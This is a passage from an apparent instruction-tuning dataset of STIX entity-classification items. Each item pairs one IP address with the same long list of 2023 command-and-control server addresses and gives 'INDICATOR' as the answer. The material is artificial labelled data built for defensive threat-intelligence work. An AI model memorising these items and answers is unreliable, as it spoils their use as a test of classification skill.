"input": "### Entity:\n143.198.152.232\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n202.182.98.100\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n64.227.64.163\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n164.92.185.60\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n216.128.178.248\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n45.32.117.62\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 